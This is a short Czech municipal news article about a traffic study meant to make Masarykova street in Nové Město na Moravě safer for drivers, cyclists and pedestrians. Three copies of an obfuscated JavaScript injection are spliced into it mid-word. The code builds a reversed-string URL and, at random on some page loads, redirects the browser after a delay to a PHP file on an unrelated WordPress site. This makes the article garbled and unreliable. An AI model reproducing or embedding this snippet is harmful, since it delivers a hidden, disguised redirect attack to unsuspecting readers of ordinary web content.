Rainbow page separator

Studie ukáže, jak zajistit bezpečnější Masarykovu ulici

Pondělí, 25. července 2016

Náměstí v Novém Městě na Moravě

Nové Měs[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to na Moravě / Prostřednictvím dopravní studie hodlá novoměstská radnice zjistit, jak co nejlépe vyřešit komplikovanou dopravní situaci v okolí frekven[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tované Masarykovy ulice. Studie zahrne Masarykovu ulici od křižovatky s ulicí Brněnskou až po křižovatku s ulicemi Soškova a Křičkova i parkoviště a chodník mezi au[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tosalonem a OK Marketem. V ulicích Soškova a Křičkova bude posuzován úsek od křižovatky s Masarykovou ulicí až po přejezd a zpracováno bude i dopravní řešení ulic Hornická a Budovatelů.
Dopravní studie se má zabývat křižovatkami, parkováním, cyklodopravou, chodníky i přechody pro chodce, přičemž z ní vyplyne nejvhodnější řešení s ohledem na bezpečnost řidičů, cyklistů i chodců. Snahou je zklidnění dopravní situace v lokalitě. Počítáno je kupříkladu se vznikem nových chodníků, případně bezpečných přechodů pro chodce. Cyklisté napříště mohou být z rušné ulice odkloněni, anebo se dočkají speciálních jízdních pruhů.